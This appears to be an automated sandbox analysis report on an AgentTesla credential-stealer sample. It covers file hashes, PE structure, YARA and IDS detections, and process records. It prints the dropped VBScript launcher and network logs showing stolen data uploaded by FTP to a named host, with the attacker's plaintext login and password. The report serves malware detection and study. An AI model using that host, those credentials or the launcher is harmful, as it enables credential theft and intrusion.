SHA-512: 27A07FEAA25F9AEF7E62292A92197FFCC33A98200B21C26227AFE6D0FFB658257846257321828AFD332DFE360713C45462C2C65F940331CB9A33C581111E2807
Malicious: true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 71%
• Antivirus: Virustotal, Detection: 62%
Reputation: low
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r...........#.S..._@'.S...R.k.S....".S...RichR...................PE..L...'Mjg.........."......p..........p.... ........@.......................................@...@.......@.....................h...$.......h...........................................................T...H...........................................UPX0....................................UPX1.....p... ...d..................@....rsrc................h..............@..............................................................................................................................................................................................................................................................................................................................................................3.91.UPX!....
Process: C:\Users\user\AppData\Local\seskin\troopwise.exe
File Type: data
Category: dropped
Size (bytes): 272
Entropy (8bit): 3.4014609375378653
Encrypted: false
SSDEEP: 6:DMM8lfm3OOQdUfcloRKUEZ+lX1WlAM8KsoBnriIM8lfQVn:DsO+vNloRKQ1jFHUmA2n
MD5: 724770FF29B37951E092F58D76FB1F3C
SHA1: 53893E6B730FA974093A13E8F0DC3A752C7DBC62
SHA-256: 29394B6EA77E5CB90DCFD62652C8C57063064BD0A6F20D3D6F33A55FD4716B2E
SHA-512: FD6D24197AE6898C14EECD289FE6AEA3F30AAB1C19ADD64F277F1C6B4FCE194F47C5E941AC32CB0C436CB69FC87BC1799DD40E2C53BFC3E74FED90061DCBC79D
Malicious: true
Preview: S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.s.e.s.k.i.n.\.t.r.o.o.p.w.i.s.e...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...
Preview, decoded (the file is UTF-16 text; the dots above are the null bytes between characters and the line breaks):
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run "C:\Users\jones\AppData\Local\seskin\troopwise.exe", 1
Set WshShell = Nothing
File type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Entropy (8bit): 7.935089786585949
TrID:
• Win32 Executable (generic) a (10002005/4) 99.39%
• UPX compressed Win32 Executable (30571/9) 0.30%
• Win32 EXE Yoda's Crypter (26571/9) 0.26%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
File name: LfZAz7DQzo.exe
File size: 615'936 bytes
MD5: 79129cf9382f91ab74a895cd2c5a0c7f
SHA1: e1590b1a5ab3212dd35732affffb68236a2ca8b2
SHA256: 1e6a8f176a0d7a9bd0321b4c032153f48b244be1584137453bf1afc07ea10157
SHA512: 27a07feaa25f9aef7e62292a92197ffcc33a98200b21c26227afe6d0ffb658257846257321828afd332dfe360713c45462c2c65f940331cb9a33c581111e2807
SSDEEP: 12288:0YV6MorX7qzuC3QHO9FQVHPF51jgckYY8bj8LfBmQdGFjZUBdYay3X8F:zBXu9HGaVHjY8n8LeWdzy3c
TLSH: EAD423C16BD2DC7AC0A92375C47E9D047422B871CE88377E539AF51EF83A396D80A51E
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..
Icon Hash: aaf3e3e3938382a0
Entrypoint: 0x518070
Entrypoint Section: UPX1
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x676A4D27 [Tue Dec 24 05:56:55 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: fc6683d30d9f25244a50fd5357825e79
                                      Instruction
                                      pushad
                                      mov esi, 004C2000h
                                      lea edi, dword ptr [esi-000C1000h]
                                      push edi
                                      jmp 00007F163C6F6F0Dh
                                      nop
                                      mov al, byte ptr [esi]
                                      inc esi
                                      mov byte ptr [edi], al
                                      inc edi
                                      add ebx, ebx
                                      jne 00007F163C6F6F09h
                                      mov ebx, dword ptr [esi]
                                      sub esi, FFFFFFFCh
                                      adc ebx, ebx
                                      jc 00007F163C6F6EEFh
                                      mov eax, 00000001h
                                      add ebx, ebx
                                      jne 00007F163C6F6F09h
                                      mov ebx, dword ptr [esi]
                                      sub esi, FFFFFFFCh
                                      adc ebx, ebx
                                      adc eax, eax
                                      add ebx, ebx
                                      jnc 00007F163C6F6F0Dh
                                      jne 00007F163C6F6F2Ah
                                      mov ebx, dword ptr [esi]
                                      sub esi, FFFFFFFCh
                                      adc ebx, ebx
                                      jc 00007F163C6F6F21h
                                      dec eax
                                      add ebx, ebx
                                      jne 00007F163C6F6F09h
                                      mov ebx, dword ptr [esi]
                                      sub esi, FFFFFFFCh
                                      adc ebx, ebx
                                      adc eax, eax
                                      jmp 00007F163C6F6ED6h
                                      add ebx, ebx
                                      jne 00007F163C6F6F09h
                                      mov ebx, dword ptr [esi]
                                      sub esi, FFFFFFFCh
                                      adc ebx, ebx
                                      adc ecx, ecx
                                      jmp 00007F163C6F6F54h
                                      xor ecx, ecx
                                      sub eax, 03h
                                      jc 00007F163C6F6F13h
                                      shl eax, 08h
                                      mov al, byte ptr [esi]
                                      inc esi
                                      xor eax, FFFFFFFFh
                                      je 00007F163C6F6F77h
                                      sar eax, 1
                                      mov ebp, eax
                                      jmp 00007F163C6F6F0Dh
                                      add ebx, ebx
                                      jne 00007F163C6F6F09h
                                      mov ebx, dword ptr [esi]
                                      sub esi, FFFFFFFCh
                                      adc ebx, ebx
                                      jc 00007F163C6F6ECEh
                                      inc ecx
                                      add ebx, ebx
                                      jne 00007F163C6F6F09h
                                      mov ebx, dword ptr [esi]
                                      sub esi, FFFFFFFCh
                                      adc ebx, ebx
                                      jc 00007F163C6F6EC0h
                                      add ebx, ebx
                                      jne 00007F163C6F6F09h
                                      mov ebx, dword ptr [esi]
                                      sub esi, FFFFFFFCh
                                      adc ebx, ebx
                                      adc ecx, ecx
                                      add ebx, ebx
                                      jnc 00007F163C6F6EF1h
                                      jne 00007F163C6F6F0Bh
                                      mov ebx, dword ptr [esi]
                                      sub esi, FFFFFFFCh
                                      adc ebx, ebx
                                      jnc 00007F163C6F6EE6h
                                      add ecx, 02h
                                      cmp ebp, FFFFFB00h
                                      adc ecx, 02h
                                      lea edx, dword ptr [edi+ebp]
                                      cmp ebp, FFFFFFFCh
                                      jbe 00007F163C6F6F10h
                                      mov al, byte ptr [edx]
                                      Programming Language:
                                      • [ASM] VS2013 build 21005
                                      • [ C ] VS2013 build 21005
                                      • [C++] VS2013 build 21005
                                      • [ C ] VS2008 SP1 build 30729
                                      • [IMP] VS2008 SP1 build 30729
                                      • [ASM] VS2013 UPD5 build 40629
                                      • [RES] VS2013 build 21005
                                      • [LNK] VS2013 UPD5 build 40629
                                      Name | Virtual Address | Virtual Size | Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_IMPORT | 0x158968 | 0x424 | .rsrc
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x119000 | 0x3f968 | .rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x158d8c | 0xc | .rsrc
                                      IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x118254 | 0x48 | UPX1
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                      Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                      UPX0 | 0x1000 | 0xc1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      UPX1 | 0xc2000 | 0x57000 | 0x56400 | cb7b922f58d960ad475a32f96ccfb12b | False | 0.9872848731884057 | data | 7.935341268187339 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .rsrc | 0x119000 | 0x40000 | 0x3fe00 | 596339e83643315742ddb396ab76efc3 | False | 0.9207933280332681 | data | 7.882060689511055 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                      RT_ICON | 0x1195ac | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
                                      RT_ICON | 0x1196d8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
                                      RT_ICON | 0x119804 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
                                      RT_ICON | 0x119930 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
                                      RT_ICON | 0x119c1c | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
                                      RT_ICON | 0x119d48 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
                                      RT_ICON | 0x11abf4 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
                                      RT_ICON | 0x11b4a0 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
                                      RT_ICON | 0x11ba0c | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
                                      RT_ICON | 0x11dfb8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
                                      RT_ICON | 0x11f064 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
                                      RT_MENU | 0xce4a0 | 0x50 | data | English | Great Britain | 1.1375
                                      RT_STRING | 0xce4f0 | 0x594 | data | English | Great Britain | 1.007703081232493
                                      RT_STRING | 0xcea84 | 0x68a | data | English | Great Britain | 1.0065710872162486
                                      RT_STRING | 0xcf110 | 0x490 | data | English | Great Britain | 1.009417808219178
                                      RT_STRING | 0xcf5a0 | 0x5fc | data | English | Great Britain | 1.0071801566579635
                                      RT_STRING | 0xcfb9c | 0x65c | data | English | Great Britain | 0.984029484029484
                                      RT_STRING | 0xd01f8 | 0x466 | data | English | Great Britain | 0.9609236234458259
                                      RT_STRING | 0xd0660 | 0x158 | COM executable for DOS | English | Great Britain | 1.0319767441860466
                                      RT_RCDATA | 0x11f4d0 | 0x38eff | data | | | 1.0003473189974916
                                      RT_GROUP_ICON | 0x1583d4 | 0x76 | data | English | Great Britain | 0.6610169491525424
                                      RT_GROUP_ICON | 0x158450 | 0x14 | data | English | Great Britain | 1.25
                                      RT_GROUP_ICON | 0x158468 | 0x14 | data | English | Great Britain | 1.15
                                      RT_GROUP_ICON | 0x158480 | 0x14 | data | English | Great Britain | 1.25
                                      RT_VERSION | 0x158498 | 0xdc | data | English | Great Britain | 0.6181818181818182
                                      RT_MANIFEST | 0x158578 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
                                      DLL | Import
                                      KERNEL32.DLL | LoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess
                                      ADVAPI32.dll | GetAce
                                      COMCTL32.dll | ImageList_Remove
                                      COMDLG32.dll | GetOpenFileNameW
                                      GDI32.dll | LineTo
                                      IPHLPAPI.DLL | IcmpSendEcho
                                      MPR.dll | WNetUseConnectionW
                                      ole32.dll | CoGetObject
                                      OLEAUT32.dll | VariantInit
                                      PSAPI.DLL | GetProcessMemoryInfo
                                      SHELL32.dll | DragFinish
                                      USER32.dll | GetDC
                                      USERENV.dll | LoadUserProfileW
                                      UxTheme.dll | IsThemeActive
                                      VERSION.dll | VerQueryValueW
                                      WININET.dll | FtpOpenFileW
                                      WINMM.dll | timeGetTime
                                      WSOCK32.dll | connect
                                      Language of compilation system | Country where language is spoken
                                      English | Great Britain
                                      Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                      2025-01-11T05:39:50.672589+0100 | 2029927 | ET MALWARE AgentTesla Exfil via FTP | 1 | 192.168.2.4 | 49734 | 162.241.62.63 | 21 | TCP
                                      2025-01-11T05:39:51.076312+0100 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.4 | 49736 | 162.241.62.63 | 48091 | TCP
                                      2025-01-11T05:39:51.083573+0100 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.4 | 49736 | 162.241.62.63 | 48091 | TCP
                                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                      Jan 11, 2025 05:39:35.660029888 CET | 49730 | 80 | 192.168.2.4 | 208.95.112.1
                                      Jan 11, 2025 05:39:35.668840885 CET | 80 | 49730 | 208.95.112.1 | 192.168.2.4
                                      Jan 11, 2025 05:39:35.668914080 CET | 49730 | 80 | 192.168.2.4 | 208.95.112.1
                                      Jan 11, 2025 05:39:35.670135021 CET | 49730 | 80 | 192.168.2.4 | 208.95.112.1
                                      Jan 11, 2025 05:39:35.678745031 CET | 80 | 49730 | 208.95.112.1 | 192.168.2.4
                                      Jan 11, 2025 05:39:36.139049053 CET | 80 | 49730 | 208.95.112.1 | 192.168.2.4
                                      Jan 11, 2025 05:39:36.191548109 CET | 49730 | 80 | 192.168.2.4 | 208.95.112.1
                                      Jan 11, 2025 05:39:37.269395113 CET | 49731 | 21 | 192.168.2.4 | 162.241.62.63
                                      Jan 11, 2025 05:39:37.274281979 CET | 21 | 49731 | 162.241.62.63 | 192.168.2.4
                                      Jan 11, 2025 05:39:37.274519920 CET | 49731 | 21 | 192.168.2.4 | 162.241.62.63
                                      Jan 11, 2025 05:39:37.299164057 CET | 49731 | 21 | 192.168.2.4 | 162.241.62.63
                                      Jan 11, 2025 05:39:37.305490017 CET | 21 | 49731 | 162.241.62.63 | 192.168.2.4
                                      Jan 11, 2025 05:39:37.305546999 CET | 49731 | 21 | 192.168.2.4 | 162.241.62.63
                                      Jan 11, 2025 05:39:47.851818085 CET | 49732 | 80 | 192.168.2.4 | 208.95.112.1
                                      Jan 11, 2025 05:39:47.856708050 CET | 80 | 49732 | 208.95.112.1 | 192.168.2.4
                                      Jan 11, 2025 05:39:47.856795073 CET | 49732 | 80 | 192.168.2.4 | 208.95.112.1
                                      Jan 11, 2025 05:39:47.857142925 CET | 49732 | 80 | 192.168.2.4 | 208.95.112.1
                                      Jan 11, 2025 05:39:47.862086058 CET | 80 | 49732 | 208.95.112.1 | 192.168.2.4
                                      Jan 11, 2025 05:39:48.313271046 CET | 80 | 49732 | 208.95.112.1 | 192.168.2.4
                                      Jan 11, 2025 05:39:48.363703012 CET | 49732 | 80 | 192.168.2.4 | 208.95.112.1
                                      Jan 11, 2025 05:39:49.344405890 CET | 49734 | 21 | 192.168.2.4 | 162.241.62.63
                                      Jan 11, 2025 05:39:49.349673033 CET | 21 | 49734 | 162.241.62.63 | 192.168.2.4
                                      Jan 11, 2025 05:39:49.349786043 CET | 49734 | 21 | 192.168.2.4 | 162.241.62.63
                                      Jan 11, 2025 05:39:49.376144886 CET | 49730 | 80 | 192.168.2.4 | 208.95.112.1
                                      Jan 11, 2025 05:39:49.864834070 CET | 21 | 49734 | 162.241.62.63 | 192.168.2.4
                                      Jan 11, 2025 05:39:49.865076065 CET | 49734 | 21 | 192.168.2.4 | 162.241.62.63
                                      Jan 11, 2025 05:39:49.869986057 CET | 21 | 49734 | 162.241.62.63 | 192.168.2.4
                                      Jan 11, 2025 05:39:49.981482029 CET | 21 | 49734 | 162.241.62.63 | 192.168.2.4
                                      Jan 11, 2025 05:39:49.981662035 CET | 49734 | 21 | 192.168.2.4 | 162.241.62.63
                                      Jan 11, 2025 05:39:49.992353916 CET | 21 | 49734 | 162.241.62.63 | 192.168.2.4
                                      Jan 11, 2025 05:39:50.192749023 CET | 21 | 49734 | 162.241.62.63 | 192.168.2.4
                                      Jan 11, 2025 05:39:50.211545944 CET | 49734 | 21 | 192.168.2.4 | 162.241.62.63
                                      Jan 11, 2025 05:39:50.220680952 CET | 21 | 49734 | 162.241.62.63 | 192.168.2.4
                                      Jan 11, 2025 05:39:50.325491905 CET | 21 | 49734 | 162.241.62.63 | 192.168.2.4
                                      Jan 11, 2025 05:39:50.325658083 CET | 49734 | 21 | 192.168.2.4 | 162.241.62.63
                                      Jan 11, 2025 05:39:50.330581903 CET | 21 | 49734 | 162.241.62.63 | 192.168.2.4
                                      Jan 11, 2025 05:39:50.439016104 CET | 21 | 49734 | 162.241.62.63 | 192.168.2.4
                                      Jan 11, 2025 05:39:50.439203024 CET | 49734 | 21 | 192.168.2.4 | 162.241.62.63
                                      Jan 11, 2025 05:39:50.444169044 CET | 21 | 49734 | 162.241.62.63 | 192.168.2.4
                                      Jan 11, 2025 05:39:50.552988052 CET | 21 | 49734 | 162.241.62.63 | 192.168.2.4
                                      Jan 11, 2025 05:39:50.553178072 CET | 49734 | 21 | 192.168.2.4 | 162.241.62.63
                                      Jan 11, 2025 05:39:50.558120966 CET | 21 | 49734 | 162.241.62.63 | 192.168.2.4
                                      Jan 11, 2025 05:39:50.666600943 CET | 21 | 49734 | 162.241.62.63 | 192.168.2.4
                                      Jan 11, 2025 05:39:50.667402983 CET | 49736 | 48091 | 192.168.2.4 | 162.241.62.63
                                      Jan 11, 2025 05:39:50.672375917 CET | 48091 | 49736 | 162.241.62.63 | 192.168.2.4
                                      Jan 11, 2025 05:39:50.672460079 CET | 49736 | 48091 | 192.168.2.4 | 162.241.62.63
                                      Jan 11, 2025 05:39:50.672589064 CET | 49734 | 21 | 192.168.2.4 | 162.241.62.63
                                      Jan 11, 2025 05:39:50.677520037 CET | 21 | 49734 | 162.241.62.63 | 192.168.2.4
                                      Jan 11, 2025 05:39:51.075978994 CET | 21 | 49734 | 162.241.62.63 | 192.168.2.4
                                      Jan 11, 2025 05:39:51.076312065 CET | 49736 | 48091 | 192.168.2.4 | 162.241.62.63
                                      Jan 11, 2025 05:39:51.076379061 CET | 49736 | 48091 | 192.168.2.4 | 162.241.62.63
                                      Jan 11, 2025 05:39:51.082356930 CET | 48091 | 49736 | 162.241.62.63 | 192.168.2.4
                                      Jan 11, 2025 05:39:51.083504915 CET | 48091 | 49736 | 162.241.62.63 | 192.168.2.4
                                      Jan 11, 2025 05:39:51.083573103 CET | 49736 | 48091 | 192.168.2.4 | 162.241.62.63
                                      Jan 11, 2025 05:39:51.138098955 CET | 49734 | 21 | 192.168.2.4 | 162.241.62.63
                                      Jan 11, 2025 05:39:51.204843044 CET | 21 | 49734 | 162.241.62.63 | 192.168.2.4
                                      Jan 11, 2025 05:39:51.254070044 CET | 49734 | 21 | 192.168.2.4 | 162.241.62.63
                                      Jan 11, 2025 05:40:39.368385077 CET | 49732 | 80 | 192.168.2.4 | 208.95.112.1
                                      Jan 11, 2025 05:40:39.374542952 CET | 80 | 49732 | 208.95.112.1 | 192.168.2.4
                                      Jan 11, 2025 05:40:39.374728918 CET | 49732 | 80 | 192.168.2.4 | 208.95.112.1
                                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                      Jan 11, 2025 05:39:35.646631956 CET | 55828 | 53 | 192.168.2.4 | 1.1.1.1
                                      Jan 11, 2025 05:39:35.653881073 CET | 53 | 55828 | 1.1.1.1 | 192.168.2.4
                                      Jan 11, 2025 05:39:36.831352949 CET | 50122 | 53 | 192.168.2.4 | 1.1.1.1
                                      Jan 11, 2025 05:39:37.265091896 CET | 53 | 50122 | 1.1.1.1 | 192.168.2.4
                                      Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                      Jan 11, 2025 05:39:35.646631956 CET | 192.168.2.4 | 1.1.1.1 | 0xce40 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
                                      Jan 11, 2025 05:39:36.831352949 CET | 192.168.2.4 | 1.1.1.1 | 0xe812 | Standard query (0) | ftp.antoniomayol.com | A (IP address) | IN (0x0001) | false
                                      Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                      Jan 11, 2025 05:39:35.653881073 CET | 1.1.1.1 | 192.168.2.4 | 0xce40 | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
                                      Jan 11, 2025 05:39:37.265091896 CET | 1.1.1.1 | 192.168.2.4 | 0xe812 | No error (0) | ftp.antoniomayol.com | antoniomayol.com | | CNAME (Canonical name) | IN (0x0001) | false
                                      Jan 11, 2025 05:39:37.265091896 CET | 1.1.1.1 | 192.168.2.4 | 0xe812 | No error (0) | antoniomayol.com | | 162.241.62.63 | A (IP address) | IN (0x0001) | false
                                      • ip-api.com
                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      0 | 192.168.2.4 | 49730 | 208.95.112.1 | 80 | 7164 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jan 11, 2025 05:39:35.670135021 CET | 80 | OUT | GET /line/?fields=hosting HTTP/1.1
                                          Host: ip-api.com
                                          Connection: Keep-Alive
                                      Jan 11, 2025 05:39:36.139049053 CET | 175 | IN | HTTP/1.1 200 OK
                                          Date: Sat, 11 Jan 2025 04:39:35 GMT
                                          Content-Type: text/plain; charset=utf-8
                                          Content-Length: 6
                                          Access-Control-Allow-Origin: *
                                          X-Ttl: 60
                                          X-Rl: 44
                                          Data Raw: 66 61 6c 73 65 0a
                                          Data Ascii: false


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      1 | 192.168.2.4 | 49732 | 208.95.112.1 | 80 | 6164 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jan 11, 2025 05:39:47.857142925 CET | 80 | OUT | GET /line/?fields=hosting HTTP/1.1
                                          Host: ip-api.com
                                          Connection: Keep-Alive
                                      Jan 11, 2025 05:39:48.313271046 CET | 175 | IN | HTTP/1.1 200 OK
                                          Date: Sat, 11 Jan 2025 04:39:48 GMT
                                          Content-Type: text/plain; charset=utf-8
                                          Content-Length: 6
                                          Access-Control-Allow-Origin: *
                                          X-Ttl: 47
                                          X-Rl: 43
                                          Data Raw: 66 61 6c 73 65 0a
                                          Data Ascii: false


                                      Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
                                      Jan 11, 2025 05:39:49.864834070 CET | 21 | 49734 | 162.241.62.63 | 192.168.2.4 | 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                          220-You are user number 1 of 150 allowed.
                                          220-Local time is now 22:39. Server port: 21.
                                          220-IPv6 connections are also welcome on this server.
                                          220 You will be disconnected after 15 minutes of inactivity.
                                      Jan 11, 2025 05:39:49.865076065 CET | 49734 | 21 | 192.168.2.4 | 162.241.62.63 | USER johnson@antoniomayol.com
                                      Jan 11, 2025 05:39:49.981482029 CET | 21 | 49734 | 162.241.62.63 | 192.168.2.4 | 331 User johnson@antoniomayol.com OK. Password required
                                      Jan 11, 2025 05:39:49.981662035 CET | 49734 | 21 | 192.168.2.4 | 162.241.62.63 | PASS cMhKDQUk1{;%
                                      Jan 11, 2025 05:39:50.192749023 CET | 21 | 49734 | 162.241.62.63 | 192.168.2.4 | 230-OK. Current restricted directory is /
                                          230 31 Kbytes used (0%) - authorized: 2048000 Kb
                                      Jan 11, 2025 05:39:50.325491905 CET | 21 | 49734 | 162.241.62.63 | 192.168.2.4 | 504 Unknown command
                                      Jan 11, 2025 05:39:50.325658083 CET | 49734 | 21 | 192.168.2.4 | 162.241.62.63 | PWD
                                      Jan 11, 2025 05:39:50.439016104 CET | 21 | 49734 | 162.241.62.63 | 192.168.2.4 | 257 "/" is your current location
                                      Jan 11, 2025 05:39:50.439203024 CET | 49734 | 21 | 192.168.2.4 | 162.241.62.63 | TYPE I
                                      Jan 11, 2025 05:39:50.552988052 CET | 21 | 49734 | 162.241.62.63 | 192.168.2.4 | 200 TYPE is now 8-bit binary
                                      Jan 11, 2025 05:39:50.553178072 CET | 49734 | 21 | 192.168.2.4 | 162.241.62.63 | PASV
                                      Jan 11, 2025 05:39:50.666600943 CET | 21 | 49734 | 162.241.62.63 | 192.168.2.4 | 227 Entering Passive Mode (162,241,62,63,187,219)
                                      Jan 11, 2025 05:39:50.672589064 CET | 49734 | 21 | 192.168.2.4 | 162.241.62.63 | STOR PW_user-287400_2025_01_10_23_39_48.html
                                      Jan 11, 2025 05:39:51.075978994 CET | 21 | 49734 | 162.241.62.63 | 192.168.2.4 | 150 Accepted data connection
                                      Jan 11, 2025 05:39:51.204843044 CET | 21 | 49734 | 162.241.62.63 | 192.168.2.4 | 226-31 Kbytes used (0%) - authorized: 2048000 Kb
                                          226-File successfully transferred
                                          226 0.124 seconds (measured here), 2.50 Kbytes per second


                                      Target ID:0
                                      Start time:23:39:31
                                      Start date:10/01/2025
                                      Path:C:\Users\user\Desktop\LfZAz7DQzo.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\LfZAz7DQzo.exe"
                                      Imagebase:0xe80000
                                      File size:615'936 bytes
                                      MD5 hash:79129CF9382F91AB74A895CD2C5A0C7F
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      Target ID:1
                                      Start time:23:39:31
                                      Start date:10/01/2025
                                      Path:C:\Users\user\AppData\Local\seskin\troopwise.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\LfZAz7DQzo.exe"
                                      Imagebase:0x550000
                                      File size:615'936 bytes
                                      MD5 hash:79129CF9382F91AB74A895CD2C5A0C7F
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.1767587810.0000000001BE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000001.00000002.1767587810.0000000001BE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.1767587810.0000000001BE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000001.00000002.1767587810.0000000001BE0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                      • Rule: MALWARE_Win_AgentTeslaV2, Description: AgenetTesla Type 2 Keylogger payload, Source: 00000001.00000002.1767587810.0000000001BE0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                      Antivirus matches:
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 71%, ReversingLabs
                                      • Detection: 62%, Virustotal, Browse
                                      Reputation:low
                                      Has exited:true

                                      Target ID:2
                                      Start time:23:39:32
                                      Start date:10/01/2025
                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\LfZAz7DQzo.exe"
                                      Imagebase:0x580000
                                      File size:45'984 bytes
                                      MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.1889523991.0000000002A2E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
